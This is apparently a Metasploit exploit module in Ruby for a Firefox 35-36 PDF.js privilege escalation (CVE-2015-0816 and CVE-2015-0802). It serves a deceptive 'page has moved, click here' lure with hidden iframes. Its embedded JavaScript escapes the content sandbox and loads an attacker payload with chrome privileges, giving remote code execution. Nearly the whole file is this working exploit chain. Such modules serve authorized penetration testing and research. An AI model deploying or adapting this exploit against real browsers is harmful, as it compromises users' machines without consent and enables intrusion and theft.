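##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit server module for the Firefox 35-36 PDF.js privilege
# escalation (CVE-2015-0816 / CVE-2015-0802). The BrowserExploitServer mixin
# only dispatches to +on_request_exploit+ for clients that satisfy the
# 'BrowserRequirements' declared below; the FirefoxPrivilegeEscalation mixin
# supplies +run_payload+, whose output is embedded in the served page.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Registers module metadata and the CONTENT option.
  #
  # @param info [Hash] module info supplied by the framework loader
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox PDF.js Privileged Javascript Injection',
        'Description' => %q{
          This module gains remote code execution on Firefox 35-36 by abusing a
          privilege escalation bug in resource:// URIs. PDF.js is used to exploit
          the bug. This exploit requires the user to click anywhere on the page to
          trigger the vulnerability.
        },
        'Author' => [
          'Unknown', # PDF.js injection code was taken from a 0day
          'Marius Mlynski', # discovery and pwn2own exploit
          'joev' # copypasta monkey, CVE-2015-0802
        ],
        'DisclosureDate' => '2015-03-31',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-0816'], # pdf.js can load chrome://
          ['CVE', '2015-0802'] # can access messageManager property in chrome window
        ],
        'Targets' => [
          [
            'Universal (Javascript XPCOM Shell)', {
              'Platform' => 'firefox',
              'Arch' => ARCH_FIREFOX
            }
          ],
          [
            'Native Payload', {
              'Platform' => %w{java linux osx solaris win},
              'Arch' => ARCH_ALL
            }
          ]
        ],
        'DefaultTarget' => 0,
        # Only Firefox 35 or 36 (by reported UA major version) is served the exploit.
        'BrowserRequirements' => {
          :source => 'script',
          :ua_name => HttpClients::FF,
          :ua_ver => lambda { |ver| ver.to_i.between?(35, 36) }
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      # Interpolated verbatim into <body> (no HTML escaping) -- see #html.
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ])
    ])
  end

  # Serves the exploit page to a client that passed the browser requirements.
  #
  # @param cli the connected client to respond to
  # @param request the HTTP request that reached this handler (unused here)
  # @param target_info [Hash] browser details gathered by the mixin (unused here)
  # @return [void]
  def on_request_exploit(cli, request, target_info)
    print_status('Sending exploit...')
    send_response_html(cli, html)
  end

  # Builds the complete page: the operator-supplied CONTENT (or the default
  # text when unset) followed by the generated script.
  #
  # CONTENT is inserted as raw HTML; it is a module option set by the
  # operator, not data taken from the client.
  #
  # @return [String] the HTML document body to send
  def html
    body = datastore['CONTENT'] || default_html
    "<!doctype html><html><body>#{body}<script>#{js}</script></body></html>"
  end

  # Text shown in the page body when CONTENT is not set.
  #
  # @return [String]
  def default_html
    "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected."
  end

  # Generates the page script.
  #
  # The output of +run_payload+ (FirefoxPrivilegeEscalation mixin) is stored
  # under a randomized key so the JSON object embedded in the script has no
  # fixed property name. Only +key+ and the JSON-encoded +opts+ are
  # interpolated into the heredoc; everything else is literal JavaScript.
  # Backslashes inside the JavaScript regex and string literals are doubled
  # because the heredoc is interpolating, so Ruby consumes one level.
  #
  # @return [String] JavaScript to embed in the page
  def js
    key = Rex::Text.rand_text_alpha(rand(5..16))
    opts = { key => run_payload }

    <<~EOJS
      function xml2string(obj) {
        return new XMLSerializer().serializeToString(obj);
      }

      function __proto(obj) {
        return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
      }

      function get(path, callback, timeout, template, value) {
        callback = _(callback);
        if (template && value) {
          callback = callback.replace(template, value);
        }
        js_call1 = 'javascript:' + _(function() {
          try {
            done = false;
            window.onclick = function() {
              if (done) { return; } done = true;
              q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px");
              setTimeout(function(){
                q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>';

                setTimeout(function(){
                  var opts = #{JSON.generate(opts)};
                  var key = opts['#{key}'];
                  q.messageManager.loadFrameScript('data:,'+key, false);
                  setTimeout(function(){
                    q.close();
                  }, 100)
                }, 100)
              }, 100);
            }
          } catch (e) {
            history.back();
          }
          undefined;
        }, "%url%", path);
        js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
        sandboxContext(_(function() {
          p = __proto(i.contentDocument.styleSheets[0].ownerNode);
          l = p.__lookupSetter__.call(i2.contentWindow, 'location');
          l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
        }));
        setTimeout((function() {
          sandboxContext(_(function() {
            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
            l = p.__lookupSetter__.call(i2.contentWindow, 'location');
            l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
          }));
        }), timeout);
      }

      function get_data(obj) {
        data = null;
        try {
          data = obj.document.documentElement.innerHTML;
          if (data.indexOf('dirListing') < 0) {
            throw new Error();
          }
        } catch (e) {
          if (this.document instanceof XMLDocument) {
            data = xml2string(this.document);
          } else {
            try {
              if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
                data = this.document.body.firstChild.textContent;
              } else {
                throw new Error();
              }
            } catch (e) {
              try {
                if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
                  return null;
                } else {
                  throw new Error();
                }
              } catch (e) {
                ;;
              }
            }
          }
        }
        return data;
      }

      function _(s, template, value) {
        s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
        s = s.substring(0, s.length - 1);
        if (template && value) {
          s = s.replace(template, value);
        }
        s += __proto;
        s += xml2string;
        s += get_data;
        s = s.replace(/\\s\\/\\/.*\\n/g, "");
        s = s + ";undefined";
        return s;
      }

      function get_sandbox_context() {
        if (window.my_win_id == null) {
          for (var i = 0; i < 20; i++) {
            try {
              if (window[i].location.toString().indexOf("view-source:") != -1) {
                my_win_id = i;
                break;
              }
            } catch (e) {}
          }
        };
        if (window.my_win_id == null)
          return;
        clearInterval(sandbox_context_i);
        object.data = 'view-source:' + blobURL;
        window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
        object.data = 'data:text/html,<'+'html/>';
        window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
          '"position:absolute; left:-9999px;" onload = "'+_(function(){
            window.wrappedJSObject.sandboxContext=(function(cmd) {
              with(importFunction.constructor('return this')()) {
                return eval(cmd);
              }
            });
          }) + '"/>');
      }

      var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';
      var i = document.createElement("iframe");
      i.id = "i";
      i.style=HIDDEN;
      i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
      document.documentElement.appendChild(i);
      i.onload = function() {
        if (this.contentDocument.styleSheets.length > 0) {
          var i2 = document.createElement("iframe");
          i2.id = "i2";
          i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;';
          i2.height = window.innerHeight+'px';
          i2.width = window.innerWidth+'px';
          i2.src = "data:application/pdf,";
          document.documentElement.appendChild(i2);
          pdfBlob = new Blob([''], {
            type: 'application/pdf'
          });
          blobURL = URL.createObjectURL(pdfBlob);
          object = document.createElement('object');
          object.style=HIDDEN;
          object.data = 'data:application/pdf,';
          object.onload = (function() {
            sandbox_context_i = setInterval(get_sandbox_context, 200);
            object.onload = null;
            object.data = 'view-source:' + location.href;
            return;
          });
          document.documentElement.appendChild(object);
        } else {
          this.contentWindow.location.reload();
        }
      }

      document.body.style.height = window.innerHeight+'px';

      var kill = setInterval(function() {
        if (window.sandboxContext) {
          var f = "chrome://browser/content/browser.xul";
          get(f, function() {}, 0, "%URL%", f);
          clearInterval(kill);
        } else {
          return;
        }
      },20);

    EOJS
  end
end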